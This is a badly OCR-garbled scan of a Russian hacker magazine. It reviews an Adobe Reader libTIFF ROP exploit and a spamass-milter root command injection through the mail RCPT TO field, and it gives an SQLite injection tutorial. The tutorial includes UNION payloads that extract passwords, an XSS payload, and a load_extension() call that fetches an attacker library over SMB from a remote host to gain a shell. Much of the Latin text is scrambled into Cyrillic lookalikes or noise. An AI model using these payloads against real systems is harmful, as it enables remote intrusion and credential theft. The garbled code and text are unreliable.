АсгоЬаІ Реабег. Опаснее других эксплойтов он тем, что не ис- 
пользует баѵаЗсгірІ;, а значит, даже если у клиента в настрой- 
ках выключен скриптинг, его все равно взломают. Ошибка 
кроется в переполнении буфера в библиотеке БіЬТШ. ЫЬТІРР, 
как нетрудно догадаться из названия, служит для обработки 
изображений формата ТІРР. Прелесть в том, что разработчики 
АбоЬе использовали старую библиотеку ІіЬТШ, которую, по 
каким-то своим причинам, не обновляли. А надо было бы, ведь 
в 2006 году в ней было обнаружено множество уязвимостей. На 
эту тему были соответствующие сообщения и даже эксплойт, 
который эксплуатировал одну из уязвимостей этой библио- 
теки в *піх системах. Создатели зловреда для АсгоЬаІ Реабег 
использовали старую уязвимость в библиотеке и наработки от 
эксплойта 2006 года и «вмонтировали» все это в РОР-формат 
(забавно, что при копировании формата ТІРР они скопиро- 
вали и шеллкоддля *піх, который, правда, не используется]. 
Переполнение происходит при обработке тэга «БоіРапде». 
Когда функция ТІРРЕеІсНЗНогіРаігП библиотеки ІіЬТМТ пыта- 
ется прочесть данный тэг, она копирует последующие N байт 
(указанных втэге] в переменную в стеке. 

_ТІРРтетсру (ср, СіТ->ЦіТ_Ьазе + <ііг->Ц(ііг_оТТзеЦ , сс) ; 



Здесь как раз указан тэг БоіРапде Г\х50\х01 ” = 0x1 50] и количест- 
во вложений — ОхСС. На самом деле это значение может быть лю- 
бым, главное, чтобы оно было больше чем 0x98, так как по факту 
этих вложений именно столько. Эти вложения и естьто, что идет в 
стек, и следуют они дальше до конца переменной ШІ. По сути, там 
находятся РОР-программа — последовательность аргументов и 
адресов, по которым будет «прыгать» процесс, калькулируя адрес 
шелл кода. 



50ШТЮЫ 



Установить последнюю версию АсгоЬаІ Реабег, на данный момент — 

9.3.1. 

УДАЛЕННОЕ ВЫПОЛНЕНИЕ ПРОИЗ- 
ВОЛЬНЫХ КОМАНД ОТУЧЕТНОЙ ЗА- 
ПИСИ КООТ В АРАСНЕ5РАМА55А55ІМ 
МИТЕК РШ6ІЫ 

• 5рата55-ті11:ег< 0.3.1 

мама 

Міііег Ріидіп — плагин для Зепбтаіі, который перенаправляет 
потоки входящий почты в ЗратАззаззіп, который, в свою очередь, 
проверяет, что переданная ему почта не является спамом. Штука 
достаточно удобная и эффективная, а потому, судя по мануалам в 
интернете, часто встречающаяся. Уязвимость в ней обнаружил хакер 
с псевдонимом Кіпдсоре, который уже не раз отличился: он опубли- 
ковал много интересных ошибок, найденных в популярных програм- 
мах, например, хзсгеепзаѵег (зутііпк], Му5С1І_ (!огта{ зіхіпд], Обау 
в ЗатЬа [бігесіогу Іхаѵегзаі) в феврале этого года и многое другое. 
Ошибка в данном плагине позволяет выполнять команды из под 
учетной записи рута, причем удаленно, что делает эту уязвимость 
крайне опасной. Для ее реализации не понадобится писать сложные 
эксплойты и сидеть в дебаггере: все очень просто, потому что ошибка 
скрывается в неосмотрительном использовании функции рореп(]. 




Воттак в «ср» копируется содержимое файла: без проверки раз- 
мера “сс”, который берется как раз из нашего тэга. Кстати, размер 
ср четыре байта, так что переполнение налицо. Таким образом, 
эксплойт копирует содержимое ТІРР-файла после указателя коли- 
чества вложенных элементов тэга БоіРапде в стек, демонстрируя 
классический пример геШгп-огіепІеб ргодгаттіпд (РОР]. Если 
по-русски, то это значит обратно-ориентированное программиро- 
вание. Его суть заключается в том, что мы меняем адрес возврата из 
уязвимой функции на код с нужной нам инструкцией, после которой 
идет инструкция возврата. Далее в стеке идет адрес следующей 
функции сдругой нужной нам инструкцией и, опять-таки, командой 
возврата, после чего берется следующий адрес и так далее. Таким 
вот способом можно работать с регистрами, собирая в них то, что 
нам нужно и вызывая полезные функции. Именно таким способом 
данный эксплойт вычисляет адрес шеллкода в заголовке ТІРР-файла 
загруженного в памяти, после чего просто переходит по этому адресу, 
передавая управление классическому шеллкоду. Собственно полно- 
ценный эксплойт присутствует на диске, запускает он калькулятор. 
Боевую нагрузку можно с легкостью менять. Для шеллкода выделено 
538 байт, впрочем, место под боевую нагрузку можно увеличить, если 
поменять константу ТІРР_0Р5ЕТ, однако это врядли понадобится, 
учитывая размеры популярных шеллкодов. 

Ключевое место эксплойта функция деп_Ш[). Ключевая строка: 



ЁХРІОІТ 



Уязвимый КОД (Си]: 

зізізбаб 
ш1Ті_епѵгсрС ( 

ЗМРІСТХ* сбх, 
сііаг** епѵгсрС 
) 

{ 

збгисб сопбехб *зсбх = (збгисб согШехС*) 
зшТі_деСргіѵ (сСх) ; 

ЗратАззаззіп* аззаззіп = зсбх->аззаззіп; 
РІЬЕ *р ; 

#іі сІеіііпесЦ ЕгееВЗБ ) 

іпб гѵ; 

#еп<ііі 

сІеЪид ( Б_РІШС , "т1Ті_епѵгсрЦ : епбег" ); 

іі ( Т1ад_ехрапс1) 

{ 



/* Обработка КОРТ ТО: */ 



бііі += " \х00\х00\х50\х01\х03 \х00\хСС\х00\х00\х00\х92\ 

х2 0\х00\х00\х00\х00 " сііаг Ьиі[1024] ; 
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ЕХРШІТ5 

РЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 




сЬаг *бтб=" %з -Ьѵ \" %з\" 2>&1"; 

$ і б бебіпесі ( НАѴЕ_8ЕРКІІ\ГТЕ ) 

зпргіпбб (Ъиб , зізеоб (Ъиб) -1 , бтб , ЗЕШМАІЬ, 
епѵгсрб [0] ) ; //размер буфера указан 
#е1зе 

/* Тут Кіпдсоре обращает внимание на возможное пере- 
полнение, если отсутствует зпргіпбб. А если даже и нет, 
то что, проверять размер уже не надо?*/ 
зргіпбб(Ъиб, бтб , ЗЕШМАІЬ, епѵгсрб[0]); 

//готовим ЕСРТ ТО: в Ъиб 
#епбіб 

беЬид (Б_ЕСРТ , " саіііпд %з" , Ъиб) ; 

#іб Ъебіпес1( ЕгееВЗБ ) 

гѵ = рбЪгеас!_тибех_1оск (&рореп_тибех) ; 

ІЙ (гѵ) 



{ 



герб бо : гооб+ : " I боисЪ /бшр/боо" 

250 2.1.5 Ок 

Эксплойт демонстрирует мощь рореп. В поле адреса в качестве 
адресата мы указываем гооІ+:, далее идет кавычка, которая закроет 
параметр -Ьѵ для зепсітаіі.. Далее идет символ трубы и команда 
боисбі АтрДоо. Это то, что для нас выполнит плагин. Затем идет от- 
крывающая кавычка, чтобы не допустить ошибку синтаксиса. Плагин 
в итоге ВЫПОЛНИТ: 

зепбтаіі -Ьѵ "гооб+ : " I боисЬ /бшр/боо"" 2>&1. 

Администратор сможет убедиться в том, что кто-то создал файл под 
учетной записью рута 

$ 1з -Іа /бшр/боо 

— гѵ\7'— г — г — 1 гооб гооб 0 2010-03-07 19:46 /бшр/боо 



50ШТЮЫ 



Исправить код вручную и пересобрать, так как патча пока нет. 



ЪеЪид ( Б_АЬМАУЗ , 

"Соиіб поб Іоск рореп шибех: %з" , 
збгеггог ( гѵ) ) ; 

аЬогб ( ) ; 

} 

#епбіб 

/*А вот тут уязвимость*/ 

р=рореп(Ьиб, "г"); 

//открываем ріре без фильтра- 
ции ввода 

іб ( ! р) 

{ 

ЬеЬид (Б_ЕСРТ, "рореп 
баі1есІ(%з) . МП поб ехрапЪ 
аііазез" , збгеггог (еггпо) ) ; 

аззаззіп-> 

ехрапбебгерб . ризЬ_Ьаск ( 
епѵгерб [ 0 ] ) ; 

Функция рореп, делает еще один 
процесс и там вызывает функцию 
ехесІІзЬеІІ рабЬ , "зЬ", "-с", <параметр 
рореп>, (сЬаг*]0]. В переменной б т б 
видно, что автор задумывал просто 
проверить введенное имя и перена- 
править поток 5І:сІ е гг, но ведь данную 
последовательность можно разбавить 
символом трубы Т, что, по сути, будет 
означать еще одну командную последо- 
вательность, только надо выбраться за 
кавычки. Эксплуатируем: 

$ по ІосаІЬозб 25 

22 0 оѵтбЪаЪох ЕЗМТР Розббіх 

(ІЛэипби) 

шаіі бгош: шеОше.сош 
250 2.1.0 Ок 




АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 



ТЕЛЕФОН 



ИНТЕРНЕТ 

ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 



• Подключение - в любом месте Москвы и Московской обл. 

* Срок подключения в Москве - 14 дней, в Московской обл. - от 14 до 30 дней* 
‘Установка прямого московского телефонного номера 
• Многоканальные телефонные номера 
* ІР-тсл ефония 

* Выделенные линии Интернет 

* Корпоративные частные сети (ѴРМ) 

• Хостинг, услуги сага-центра 

РІИ Телеком чпмжгті.ги е -та іі: ігИо@гт!.ги (495) 988-8212 

Приглашаем специалистов, имеющих опыт работы в области телекоммуникаций 
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ЭКСПЛУАТИРУЕМ ИНЪЕКЦИИ В ЗОНТЕ 



На свете есть разные СУБД распространенные и не очень. Хакеры уделяют большое 
внимание популярным СУБД откапывая все новые и новые варианты использования 
инъекций. Пользуясь случаем, всем выражаю огромную благодарность за эти 
раскопки. Тем не менее, жизнь непредсказуема и многогранна, так что случается 
работать и с малораспространенными базами. Я решил написать эту статью, потому 
что ни одного русскоязычного текста по инъекциям в ЗСОе мне найти не удалось. 



ОСОБЕННОСТИ 
И ОБЛАСТЬ ПРИМЕНЕНИЯ 

Первое и основное отличие ЗОЫТе от других 
СУБД заключается в том, что в роли сервера, 
который мы привыкли видеть висящим на 
порту 3306, выступает файловая система. 
Файлик с базой размещается где-нибудь и 
при подключении указывается только путь 
до этого места и имя файла. Второе немало- 
важное отличие — разграничение прав: в 
базовом варианте файл с базой не зашиф- 
рован, соответственно его можно открыть и 
вытащить все данные. На плечах админи- 
стратора лежит ответственность по разгра- 
ничению прав доступа к файловой системе 
таким образом, чтобы файл с базой не смогли 
скопировать извне. Все эти особенности 
становятся очевидными, если рассмотреть 
основную область применения 5СН_іІе. Это 
встраиваемая база: ЗутЬіап, Арріе іРЬопе, 



Ооодіе АпбгоісІ и многие другие использу- 
ют ее для хранения данных — это удобно, 
быстро и эффективно. Но инъекции для 
встраиваемых решений не так популярны, 
как для веб, поэтому веб-разработчики тоже 
решили порадовать хакеров и написали мо- 
дули 50Ы1;е для ѴѴогсІргезз, рбрВВЗ и многого 
другого. В общем-то, много писать там особо 
не надо — РНР имеет нужные модули. 

КАК ЗОНТЕ ИСПОЛЬЗУЮТ РАЗРАБОТ- 
ЧИКИ ВЕБ-ПРИЛОЖЕНИЙ 

ЭОЫТе можно встроить куда угодно, но мы 
будем рассматривать самый распростра- 
ненный вариант — РНР. Для подключения 
«легкой базы» у разработчика РНР есть 
две возможности — использовать модуль 
рЬр_5дІі1:еЗ или рЬр_5д1И:е (для версий СУБД 
3 и 2, соответственно] или использовать 
модули рЬр_5дІМ:еЗ + рбр_рсІо_5дІі1:е. Для 



хакера, реализующего найденную инъекцию, 
неважно, какой именно вариант выбрал 
разработчик. Для разработчика же драйвер 
третей версии открывает новые возмож- 
ности для того, чтобы эту самую инъекцию 
хакер не нашел. В трешке есть новый класс, 
который зовется ЭОиіеЗЭітІ; — это обертка 
для выполнение ргерагеб зіаіюппепі:. То, что 
в народе критикуется для Му5С11_ (передаю 
привет разработчикам Еіеапог СМ5 :] ]. Ис- 
пользование такого варианта предотвращает 
возможность проведения инъекции с кавыч- 
ками. Как показывает опыт, разработчики 
нередко пишут так, что оба эти варианта не 
требуются. Например, когда имя таблицы за- 
висит от пользовательских данных. Ргерагеб 
Эііаіеппепіз работается только для перемен- 
ных запроса, то есть после того, что идет за 
«РВОМ іаЫе». Сколько инъекций проведено 
по такой глупости через всякие туздІ_геаІ_ 
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Через инъекции, результат которых 
попадает в НТМІ, можно делать Х55. 



езсаре_5Ігіпд(] и тому подобные страшные функции не 
сосчитать... 



ПОЛЕЗНЫЕ ДЛЯ ИНЪЕКЦИЙ ФУНКЦИИ. 

Видимо, самая популярная функция для иллюстрации 
инъекциями — это ѵегзіопі). В БОБТе ее аналог называет- 
ся здШ:е_ѵег5Іоп(] (все не каку людей] и выводит версию 
в таком формате: 



зд1іЬе> зеІесЬ зд1іЬе_ѵегзіоп ( ) ; 
3.6.23 



Также может быть полезна функция зиЬз1:г(Х,Ѵ] или 
зиЬз1:г(Х,Ѵ,2]: здесь стоит обратить внимание, что третий 
аргумент — это длина возвращаемой строки, а не пози- 
ция до которой строка обрезается. Нумерация символов 
начинается с 1 . 



зд1іЬе> зеІесЬ зиЪзЬг ( ' аЪсйеЬдЪ. 1 , 1 , 2 ) ; 
аЬ 

В ряде случаев может быть полезно получение символа 
0x00, например для инклудов. Специально для этих целей 
в БОБіІе есть функция 2 егоЫоЬ(І\І). Параметр N указывает 
сколько символов 0x00 возвращать. 

Если надо почистить выборку от ненужных символов, 
пригодится 1хіт(Х,Ѵ]. Во второй аргумент надо положить 
строку из тех символов, которые следуют убрать из начала 
и конца строки X. 

зд1іЬе> зеІесЬ Ьгіт( 1 аа12312азс!123азс1а ' , 1 азй' ) ; 
12312азс1123 



Узнать опции, с которыми собрана библиотека для работы 
с БОБТе, можно функцией 5ЦІі1:е_сотріІеор1:іоп_де1:(І\І). 
Номер опции перебирается, начиная от нуля. 



зд1іЬе> зеІесЬ 
ЕЫАВЬЕ_ЕТЗЗ 
зд1іЬе> зеІесЬ 
ЕШАВЬЕ_ЕТЕЕЕ 
зд1іЬе> зеІесЬ 
ТЕМР_5ТОЕЕ=1 
зд1іЬе> зеІесЬ 
ТНЕЕ АБЗ АЕЕ = О 



зд1іЬе_сотрі1еорЬіоп_деЬ ( 0 ) ; 
зд1іЬе_сотрі1еорЬіоп_деЬ (1) ; 
зд1іЬе_сотрі1еорЬіоп_деЬ (2 ) $ 
зд1іЬе_сотрі1еорЬіоп_деЬ ( 3 ) ; 



Очень обидно, что нет базовых функций сопсаШ и сЬаг() 
или чего-нибудь такого для преобразования цифр в 
буквы. Такие вещи крайне полезны для подстановки в 




$ОШе 





ТЬе зді 1ч 5ді_і1е (2009) 

ДлЛЬог Ріек Р ѵэп<іегіап5 
РиЫІіЬег; Ши. ДОЛ 

Дгпдзпгі 



\% а &гта|1, Гее*., вйтЕксЮдЫ#, дИлЬэяз К Іі «вд 4441 г*д твгчоапкпЕ, апеЕ К 

ер«л «у» ТЬ *4 Ь->Ы йКСгІЬ» &ОІ.ІЕ* іп йнаІІ, 1Л№ЕН1иді#вА О-Г йзэгпріед, ріцл а ргрѵчп адаздсГ) ог4 і(гцс(у4, 
(4 Ьос к (44444 уОи (д и«4 ^00(4 «ЮсІЛЧІу №4 «^КІІѵаІу. П ООпЕаяЧ 4 Соп^ІвЕ* ЗЛСгІрНОп дГ іЬд «Л 
ГІІ Йідщ Ж ігГ(і|*т$Л(*0 1л $00(4 ѵ*ЧІ0Й 3,4, тт* ЬОйЪ С4П ІМ І44Л Ж Ъ ЕиІѴіаІ 4 гі***П*0» ЬЖ*:. №3* 1& 

ЕЬ* гчлшол ЗОЕ. 4івтрІ4» емвітаи* !гк*ив« Ігѵ ЕМ 6 Ьнк Сфі Ь* йОнлЮвШ іт^йі ипяж.гЗапЯ, 



БОБіІе 

-• ® 



Ап ІпІгоЛисІіап Іа 5СЩі1е - 2псІ Ейіііоп (2009) 

АуіЬм ІЧ»Ы НівЛ«?вта 
РиЫІіЬег. 5№йІУи 

Дтакудр . 



ТГм □ ІенЕ і& ѵітітіёп " г і ПиепЕ ЛаріГйЕ* ерѳсіЙсаІІѴ (от а ларагже вцсПитое ТИй- і-б Е№ зесопй ейіііоп о і №е Ев* - ЕЬе 
ПгаЕ егіІЕІой к-ае ЩэІГ-5Ье<1 Іп КЙЬ 



литература для освоения базы 50ІЛе 



строковые аргументы, когда экранируются кавычки. 
Впрочем, как будет показано ниже, в БОБТе экраниро- 
вание довольно странное. 

КРЫЛЬЯ, НОГИ... ГЛАВНОЕ - ХВОСТ! 

Во многих случаях для инъекции требуется экраниро- 
вание хвоста запроса. В разных СУБД это решается 
своими спецсимволами и имеет ряд особенностей. В 
МуБОБ, как описано в официальной документации, здШ:е. 
огд/[апд_соттепЕЫ;тІ разрешается использовать две 

КОНСТРУКЦИИ: 

--сотшепЬ 
/* сотшепЬ*/ 

Причем последний вариант закрывает комментарий либо 
по «*/» либо просто по окончанию строки запроса. Так что 
вот такой вариант: 

ЗЕЬЕСТ * ЕЕОМ Ьетр ШНЕЕЕ ій = ' ігщ есЬіоп-Ьеге 
/*' апй дгоий_ій= ' 5 ' 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• — мой 
блог. Пишу по мере 
желания. Жду 
комментариев, 
отвечу на вопросы. 

• ЬБрУ/здІіІе. 
огд/Іапд.ЫтІ — 

синтаксис БОБ для 
БОБіІе. Рекомендую 
обратить внимание 
на встроенные 
функции. 

• здШю.огд/ІітТз. 
Ыт - перечень 
ограничений 
БОБТе. Полезно для 
ознакомления. 



является полностью законным и работоспособным. Кроме 
того, могут быть любопытными такие запросы: 

ЗЕЬЕСТ ій, ЬехЬ ЕЕОМ сіаЬа ШНЕКЕ ісі= ' 5 ' 

ШПОИ ЗЕЬЕСТ изег, разз ЕЕОМ изег 1 
ЗЕЬЕСТ ісі, ЬехЬ ЕКОМ йаЬа ШНЕКЕ ій= ' 5 ' 

ЬМІОМ ЗЕЬЕСТ изег, разз ЕЕОМ изег ' ' ' ' ' — 
повторения 1 

ЗЕЬЕСТ ій, ЬехЬ ЕЕОМ йаЬа ШНЕКЕ ій= ' 5 1 
ІЖІОМ ЗЕЬЕСТ изег, разз ЕЕОМ изег " 

ЗЕЬЕСТ ій, ЬехЬ ЕКОМ йаЬа ШНЕКЕ ій= ' 5 ' 

НШІОМ ЗЕЬЕСТ изег, разз ЕЕОМ изег — по- 

вторения " 



• здІіІе.огдЛад. 

Ыт - очень 
много полезной 
информации по базе 
можно получить 
отсюда. 

• сгурЬсот/ 
боситепІабоп.Ыт — 

один из модулей для 
шифрования файла 
с базой. Использует 
АЕ5 и 1 пароль. 



Они тоже вполне работоспособны и выполняются. 



ЭКРАНИРОВКА 

В драйверах БОБКе есть функция, которая по задумке 
должна предотвращать инъекции. Это некий аналог 
ту5дІ_е5саре_5Іхіпд. Называется она 5дІіІе_е5саре_ 
зІхіпдО и для третьей версии базы — здШ:еЗ_е5саре_ 
зЬгі пд (] . Сразу замечу, что две эти функции работают 
одинаково. Но в отличие от старших собратьев, экраниро- 
вание в БОБіІе не такое продвинутое. Я провел коротень- 
кий тест и выявил, что же на самом деле фильтруется. 

Все оказалось очень весело: 

1 . Из символов ' " \ - / * % _ здІИ:е_е5саре_5Ігіпд и зд ИЬеЗ_ 
е5саре_5Ігіпд экранируют только одинарную кавычку. 

2. Экранирование происходит такой же одинарной кавыч- 
кой. То есть ‘ превращается в ". 

Отсюда делаем интересные для хакера выводы: 




> ѵѵагпіпд 

Внимание! 
Информация 
представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни 
редакция за 
твои действия 
ответственности не 
несет 
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взлом 



1. Код вида: 



$диегу = ' ЗЕЪЕСТ сІаЪа ЕЕОМ ЪаЫІ ѵ/Ьеге 
іс!=" ' . здііЪе_езсаре_зЪгіпд ($ій) . 1 " ' ; 

ИЛИ 

$диегу = 'ЗЕЪЕСТ ЦаЪа ЕЕОМ ЪаЫІ ѵ/Ьеге 
іс!=" ' . здііЪеЗ_езсаре_зЪгіпд ($ісЦ . ' " ' ; 
уязвим к инъекции вида: 

ІезЪ . рЪр? ісі=1 " / * * /ШІОЫ/ * * / ЗЕЪЕСТ/ * * / 
раззѵгагсі/ * * /РЕОМ/ * * /ЪГЗЕЕЗ/ * * /ЪІМІТ/ * * / 1 



2. При попадании результатов работы функ- 
ции 5Ц ІИ:е_езса ре_5І:гі пд () и 5ЦІі1:еЗ_е5саре_ 
зІхіпдП в тело НТМЕ возможно проведение 
атаки ХВВ вида: 



<іприЪ Ъуре= ' ЪехЪ 1 ѵа1ие= ' ЪезЪ ' ' 
опсііск=іаѵазсгірЪ :аіегЪ (22 ) ' > 



3. Возможно проводить атаки на І_ІКЕ, на- 
пример, расширять выборку символом % или 
нарушать логику работы веб-приложения. 

4. Возможна искусственная «порча» запро- 
сов символом \, например для кода: 



$диегу = "ЗЕЪЕСТ сІаЪа РЕОМ ЪаЫІ ѵ/Ьеге 
іс!= 1 " . здііЪе_езсаре_зЪгіпд ( $ісЦ . " ' " ; 



БОІЛе применяется в устройствах. 

ИЛИ 



$диегу = "ЗЕЪЕСТ сІаЪа РЕОМ ЪаЫІ ѵ/Ьеге 
іс!= ' " . здііЪеЗ_езсаре_зЪгіпд ($іс!) . " ' " ; 
запрос вида: 

ЪезЪ .рЪр?ісі=\ 

приведет к ошибке в ВОЕ синтаксисе. Также, 
если результат выполнение функций будет 
передан в НТМІ_, возможно изменение логи- 
ки НТМІ_ кода. 

ТЯНЕМ ТАБЛИЦЫ ЗА УШИ. 

В МуВОЕ есть такая полезная штука, как 
!НР0КМАТ10Н_ВСНЕМА. Она появилась в 
пятой версии СУБД и радует хакеров инфор- 
мацией о таблицах. В ВОЕЕе существует ее 
аналог — специальная таблица под назва- 



нием В0Е1ТЕ_МАВТЕВ, которая присутствует 
и во второй и в третьей версиях. Структура 
этой таблицы следующая: 

ТАВЪЕ зд1іЪе_шазЪег ( 

Ъуре ТЕХТ, 
паше ТЕХТ , 

ЪЫ_паше ТЕХТ , 
гооЪраде ШТЕСЕК, 
зді ТЕХТ 

) ? 

Крайне удобная и полезная таблица. По сути, 
вся ценная информация лежит в последней 
колонке под названием ВОЕ. Там хранится ВОБ- 
запрос, которым таблица создавалась. Таким 



образом, можно сразу узнать и название табли- 
цы и названия ее колонок и типы данных с раз- 
мерностью. Созданные триггеры и индексы ле- 
жат здесь же. В общем, кладезь информации! 
Помимо глобальной таблицы есть еще таблица, 
которая хранит в себе временные изменения, 
пока транзакция в базу еще не прошла, она 
называется ВСБІТЕ_ТЕМР_МАВТЕВ. 

ГРУЗИМ ШЕЛЛ ЧЕРЕЗ ИНЪЕКЦИЮ 
СРАЗУ В ПАМЯТЬ! 

Самой потрясающей находкой оказалась 
функция Б0А0_ЕХТЕЫВ10 N () . Во второй вер- 
сии базы такой функции нет, однако, положа 
руку на сердце, двойка ВОББе встречается 
крайне редко, если вообще встречается. 

Если про смысл этой функции тебе все 
понятно из ее названия, дальше можно не 
читать статью. Я же просто скопирую сюда 
кусок официальной документации: 

ТЪе ІоасЩехЪепзіоп (Х,У) ЪипсЪіоп 
іоасіз ЗОЪіЪе ехЪепзіопз оиЪ оі 
ЪЬе зЬагесі ІіЬгагу іііе патесі X 
изіпд ЪЪе епЪгу роіпЪ У. Іі У із 
отіЪЪес! Ъкеп ЪЪе сіеіаиіъ епЪгу 
роіпЪ ОІ зд1іЪеЗ_ехЪепзіоп_іпіЪ із 
изесі. ТЬе ехЪепзіоп сап асБІ пем 
іипсЪіопз ог соІІаЪіпд зедиепсез, 
ЬиЪ саппоЪ тосіііу ог сІеІеЪе 
ехізЪіпд ЪипсЪіопз ог соІІаЪіпд 
зедиепсез Ьесаизе Ъііозе іипсЪіопз 
апсі/ог соІІаЪіпд зедиепсез шідЬЪ 
Ье изесі еІзеѵіЬеге іп ЪЬ.е сиггепЪІу 
гиппіпд 8<2Ъ зЪаЪешепЪ. То Іоасі ап 
ехЪепзіоп ЪМаЪ сЬапдез ог сІеІеЪез 
іипсЪіопз ог соІІаЪіпд зедиепсез, 



Пример уязвимого кода, использующего функцию 5цШе_езсаре_ 
зігіпдИ 

т < 

2 $иіию- Ьис 1 : 

А 

$ЕГГІ I 






!,/* V гОа-СрадЕ, / ■ 1Те_ная-йе с“| 



(«I ■ і 

гскю "йеиііі од а роз* . . , \ п м і 

иіѵпнаъві 

і 

есйа (лег [ ' рая II іііз 1 ] . -Ля" . Г ' ірая1_сапЫні1 ' ] , "Л л" [ 1 риІ шШ г ‘ ] ► л" . { ' рав1_Иаі г ' 1 ч "Л а" - $«Т [ ' «и* а 1 ] ; 

> 

а 

3 есіи) -‘Сап' Ь весна (йпуІяЫе сВЫа .<ЬгЬЛп н '. гдіхіе Іааі аггпг О / 

2* } 
а \-і> 



(»ШІ и>нт«і 

ГР ИРТ ЩЕІІг *МИАРТ XI 

Р?г?_ічеііог ЫдітТІй] ТИТ Т№1Ь + 

шОиііІіЦ 

і'іеіі О Тіа»: С.СІІ 
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Ыокіа, Могіііа, 5СИ-і*е созданы 
быть вместе. 



изе Ыіе зд1ікеЗ_1оас1_ехЬепзіоп ( ) 

С-1апдиаде АРІ . 

Короче говоря, первый аргумент — имя 
файла-библиотеки. Второй аргумент — 
точка входа, если он не задан, используется 
стандартная точка входа — функция 5ЦІіІеЗ_ 
ехІеп5Іоп_іпіШ. Там еще написаны какие-то 
странные слова про то, что библиотека не 
может переопределять функции, уже суще- 
ствующие в БОЫіе, якобы, для этого надо 
использовать какую-то С++ АРІ. Неужели 
разработчики не понимали, какой горизонт 
они открывают для работы с памятью?! Чтобы 
обойти ограничение на переопределение 
встроенных в БСНіІе функций для ѴѴіп32 есть 
вот такой ИСХОДНИК: 

#іШеТ НАСК 

//'зеіеск 1оас1_ 

ехЬепзіоп( ' зд1іЬе_1251 .<111 ' , ' Ьаск' ) ; 

ШОКО ШЫАРІ ТЬгеаЬРгос ( 
здІікеЗ *сЗЬ) 

{ 

Зіеер (3000) ; 
зд1іЬеЗ_ехЬепзіоп_іпіЬ ( 
сіЬ , 0 , зд1ікеЗ_арі ) ; 
гекигп 0 ; 

} 

іпк сіесізрес (сПІехрогЬ ) 

ссіесі Ьаск ( ) 

{ 

НАГГОЬЕ ЬТЬгеаЬ; 
30ЫТЕ_ЕХТЕ№ІОЫ_ШІТ2 (рАрі) 
ЬТЬгеасІ = СгеаЬеТЬгеаЬ (ШЬЬ , 

0 , ТЬгеаЬРгос , ЬЪ , 0 , 0 ) ; 
СІозеНапсПе (ЬТЬгеас!) ; 



• О Л 1 >**г іиЛрй 1 - і'М-ніИі-рч рГуіІІх Г ‘ ' ( 4*14 " " Туг' '-п 1 " т Л* 

Ёхлшріе:: ІЧаіпц м}І-ііуес(кш іо кінт ііліиікіке ^шс^иге 



[иі 



■ 




Еіз-окгйій 

ЕИМ» 






ІіЫг 


^ЬІЕіили- 


ІаЫыт 


4 


ІСЕЕАТЕ ТАВЬЕ нЫмыс( П> ЦрйДО» КОТ ЫШХ ШЫАКТГ КЕТГ, | КОТ ЫШХ Г 4ш 

і«й. ѴАКСНАВІ255) )>Е«в ыЬ 0 Тв» 0 636 


ѣплг, кофе 



Пример получения информации об архитектуре базы через 501-- 
инъекцию. 









5КгнМ. Раз*, ПвіізЬ 
СЬ&ке апу г/та 



и еегеее Эцррогі 



801Л« й а зоНювгв НЬгуѵ ІЬаі Ітріетелі* а кМЧогйа 

.огіГі.^~ эі і : п г Р^п.-аііійпі! ЗОЬ (іаіаімзе епділе. ёрЬИе іі 1Ье гг- = і ■.-л сіеіу 

501 сів^еЬам епдіпе іп іЬе «о*ісі. тне «щгсе акЕе № $0111® і? іг> іНе і ■ ск • и г •. 



Франко ГБ 



Опфаігнэ гіеѵеІортепЕ агкі ггйіпЕ? 
І'Г.иига тетЬвгВ, Іпсіисііпд: 



тогіііа 

ВІоотЬегд 



ѳ 



ь* * ті С- ІгііИл И Ш 



м 

АгіоЬе 



;Ша - ѵѴогкІпд іо рсеаегѵе сЬоІсе апй Іппоѵаііоп 
оп ЕЬе Іпіетеі. 



Ек'СшЬісз ■ А иогЩ іеасГег іп йпвпсЕаіЧпГошіаііоп 
іесЬтюГору . 



А > ! _ №ѵоІиііопігеі Ію** іЬе ѵмігігіі епдадк игііЬ 

ійе« апсі іліЪтпаиоп ■ алуіФеге, апуііте, апсі 
іЬгоиф влгу теФигп. 



СіШеіІІ 5ІЭІ1І5 

- ѵ-убіс-г. „Ь оГ ЗДЫе іб геоогптепгівсі ЕЬг а 
пей Йеиеіорлѵзпь Црдгасіілд йтт ѵегеЕоп 3.6. 
3 - 6 . 13 , эпй 3 . 6.22 І 5 ор«опа 1 . УруяІІпд 1 п?т 
оіЬег ЗДШе ѵегзіопн I* геошнгилйв^. 

-I 



■ КЗ 

* І'Щ Гі^..;гі: Гі ", 

* ЕМ&& Дтйіші&ті 

- Асюге&аЕе ЬлсЕІопэ 

• С/С++ атегГасе вр&с 

* ІгИгогіисМоп 

- ЬаЕ рг С-іатаиме АРІа 

• ТГ><? ТО. тг&т'ьгу ж 

• РеѵеіоогпелЕ ТІтеНпе 

• Кеюгі а Вид 

• Ш 



Вот такое окошко выпадает на ѴѴіп-машине если пытаться сделать 
І_0А0_ЕХТЕЫ5І0ІЧ(‘С:/Ьоо1.іпі’). Мне понравилась фраза про 
дискетку... 



геСигп 0 ; 

} 

#еп<іі^ 

Этот код я случайно нарыл в гугле пока 
писал статью: іЬеІі.із-а-деек.огд/Ыод/ 
беѵеіортепі/здіке Ьаск.1024рх#соттеп1 
апсбог . Но это все лирика, не надо далеко 
ходить и выдумывать, если сразу можно 
получить шелл. Приводить здесь исходник 
такой библиотеки я не буду, потому что 
это, во-первых, слишком тривиально, а, 
во-вторых, может кому-то навредить. Таким 
образом, для получения шелла нужно еще 
каким-то образом залить саму библиотеку 
на веб-сервер. Никаких ІІЧТО ОІІТРНЕ, 

ІІЧТО ОІІМРРИЕ, равно как и ШАОРНЕО в 
БОЫіе нету. Зато... Если веб-сервер управ- 
ляется ѴѴіп-машиной, то ничего заливать не 
потребуется вовсе. Волшебная ОС откры- 
вает путь к получению файла с библиотекой 
по 5МВ: 

ЗЕЬЕСТ сіака ЕКОМ ІЫ1 
ШЕКЕ ісі="5"/**/иКІОЫ/**/ 

АЩ / * * / ЗЕЬЕСТ / * * / ЬОАБ_ 

ЕХТЕЕЗІОЕ ( " \\10 .10 . 10 . 10\еѵі1-1іЬ . 
сЗИ" , "ЫпсЗЗЬеН " ) ; 

Кроме того, эту функцию можно использовать 
для проверки наличия файлов на целевой 
системе. Например, если файла не существу- 
